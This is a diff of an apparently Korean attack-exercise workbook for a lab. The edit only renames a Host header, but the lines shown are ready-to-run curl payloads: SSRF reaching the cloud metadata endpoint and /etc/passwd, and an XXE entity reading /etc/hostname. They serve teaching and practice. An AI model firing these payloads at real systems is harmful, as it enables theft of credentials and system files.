--- a/contents/battle-workbook/attack-adv-w04.docx
+++ b/contents/battle-workbook/attack-adv-w04.docx
@@ -456,15 +456,15 @@
         </w:rPr>
         <w:t># SSRF — 내부/메타데이터 접근 시도 (태그 포함)</w:t>
         <w:br/>
-        <w:t>curl -s -H "Host: admin.6v6.lab" \</w:t>
+        <w:t>curl -s -H "Host: admin.el34.lab" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  "http://192.168.0.161/files/read?url=http://169.254.169.254/latest/meta-data/aa04r1-kim"</w:t>
         <w:br/>
-        <w:t>curl -s -H "Host: admin.6v6.lab" "http://192.168.0.161/files/read?url=file:///etc/passwd%23aa04r1-kim"</w:t>
+        <w:t>curl -s -H "Host: admin.el34.lab" "http://192.168.0.161/files/read?url=file:///etc/passwd%23aa04r1-kim"</w:t>
         <w:br/>
         <w:t># XXE — 외부 엔티티로 파일 읽기 (태그 포함)</w:t>
         <w:br/>
-        <w:t>curl -s -H "Host: admin.6v6.lab" -H "Content-Type: application/xml" \</w:t>
+        <w:t>curl -s -H "Host: admin.el34.lab" -H "Content-Type: application/xml" \</w:t>
         <w:br/>
         <w:t xml:space="preserve">  --data '&lt;?xml version="1.0"?&gt;&lt;!DOCTYPE r [&lt;!ENTITY x SYSTEM "file:///etc/hostname"&gt;]&gt;&lt;r&gt;aa04r1-kim&amp;x;&lt;/r&gt;' \</w:t>
         <w:br/>
